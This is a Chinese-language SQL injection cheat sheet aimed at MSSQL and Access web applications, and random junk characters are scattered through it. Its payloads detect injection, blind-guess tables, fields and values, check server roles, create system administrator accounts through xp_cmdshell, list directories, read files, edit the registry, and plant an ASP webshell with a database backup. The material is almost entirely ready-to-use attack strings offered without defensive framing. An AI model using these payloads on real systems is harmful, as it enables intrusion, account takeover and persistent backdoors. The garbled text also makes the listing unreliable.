1.判断是否有注入;and 1=1 ;and 1=2 s;Q!X ?Q
2.初步判断是否是mssql ;and user>0 }o`76rDN
?6WY:Zec@
3.注入参数是字符'and [查询条件] and ''=' 1=V-V<
3a'<*v<xw
4.搜索时没过滤参数的'and [查询条件] and '%25'=' MQ6KN(?\ZL
SwMc
pNo
5.判断数据库系统 XwaXdvmK
q(84+{>B
;and (select count(*) from sysobjects)>0 mssql fNFY$:4X
&%J08l6
;and (select count(*) from msysobjects)>0 access X'iWJ8
S"H2 7
.?$gpM?i
4.t-i5
6.猜数据库 ;and (select Count(*) from [数据库名])>0 %EB/b
Ysv"
6b}
7.猜字段 ;and (select Count(字段名) from 数据库名)>0
ew4U)2J+
Gk6iIK
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 >z@0.pN]7
jse&DQ
9.(1)猜字段的ascii值(access) S)@j6(HC4
sXFZWj}\
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 |yPu!pfl
I; rGD^
(2)猜字段的ascii值(mssql) Cp0=k
WH^%:4
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 nU7[c| =
EADqC>
10.测试权限结构(mssql) w``U=sfmV
{)sdiE
_H@DLhH|=
.7X^YKR
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- j0q&&9/Jj
X^j fuA
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- cw
<l{A
f3y=Wxk[
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- AA>P`C$&M
1?l1:}^L
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- [Y `W
)vlhN2iv
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- G 01ON0
,eS)e+yzc2
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- =7UsVn#o
Tw<q,O
;and 1=(select IS_MEMBER('db_owner'));-- xskz)kk
I7]8Y=xf
o)/ 0a
Tp2.VIoQ=
11.添加mssql和系统的帐户 #KvlYZ+1
#AY&BWS$
;exec master.dbo.sp_addlogin username;-- }x,S%M-
;exec master.dbo.sp_password null,username,password;-- Dw"\/p:-3
c &c@M$
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- *0ro0Z|Iq
yB!dp;gM{
;exec master.dbo.xp_cmdshell 'net user username password [nh>vqum
(cO:`W6.
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- 3OB"#Ap8<
rvM {M/4
;exec master.dbo.xp_cmdshell 'net user username password /add';-- yf,z$CR
-nwypu
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- 8 zb/xP>
N$tGQ@
;9#KeA _
1\.pMHv/
12.(1)遍历目录 vih9KBT
Dt1jW
;create table dirs(paths varchar(100), id int) 7}mFL*
/mZE/>&~,
;insert dirs exec master.dbo.xp_dirtree 'c:\' w!XD/jN
St^5Byd<
;and (select top 1 paths from dirs)>0 |':{lH6+1
Y4YJJYvD
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) n&!-9:0
}QmqoCAE~m
(h
`V+
!n%j)`0M
(2)遍历目录 nr3==21Om4
z@j8lv2j1
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- H,NF;QPPC
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 rT>wg1:
Alq(QDs
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 qxj(p o
jb)ZLA;L_c
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 *NQ/UXE
V.2_i*
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 e}W)LPR!
phz&zlD
FGkVqZ Y2?
|l!aB(NW
13.mssql中的存储过程 7[wPn`v2
yDh6KUK
xp_regenumvalues 注册表根键, 子键 D/' dTrR
+H2Qk4XFB
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 4Po_-4
C9;kpqNG#u
xp_regread 根键,子键,键值名 c*M}N?|6
," ql5Q4
;exec xp_regread "Rl}VeDY
Q59W#e)
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 D&zle~" J
F:ELPs4"
xp_regwrite 根键,子键, 值名, 值类型, 值 &c #N)U
T]$U""
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 #A.@i+Zv
:gC#hmm^
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 BJ0?kX@
'B}qZCy W
xp_regdeletevalue 根键,子键,值名 048kPXm`
XX~,>Q}H=
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 M^I(OuRMeI
hv+zGID7
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 ;wD)hNLAvR
%XTI-B/K
2T`!v
yLcEX
14.mssql的backup创建webshell rM"l@3hP
OrG).^l
use model [S<";l8
i6N',&jFU
create table cmd(str image); S
tyfB
.|=\z9_7S8
insert into cmd(str) values (''); E} .^kc[(4
jh$='G n
backup database model to disk='c:\l.asp'; et+0FF
,
w#J2 wS
A)KZa"EX
|K~Nw&rZ]
15.mssql内置函数 ]%(2hY~i
y> (w\K9W
;and (select @@version)>0 获得Windows的版本号 xLn%hxm?,
H[|~/0?K
;and user_name()='dbo' 判断当前系统的连接用户是不是sa d!{r v
q'11^V!0
;and (select user_name())>0 爆当前系统的连接用户 B1Oq!k
|'2d_vR
;and (select db_name())>0 得到当前连接的数据库 =Runf
+}
LHmZxi?
<6=c,y
C.QO#b
16.简洁的webshell ~;] d"'
mcok/,/
use model "ITIhnE
lRdChoL$2
create table cmd(str image); 6zn5UW#q
D#z:()VT(
insert into cmd(str) values (''); ze;KhUPRm
-{_PuJ "
backup database model to disk='g:\wwwtest\l.asp';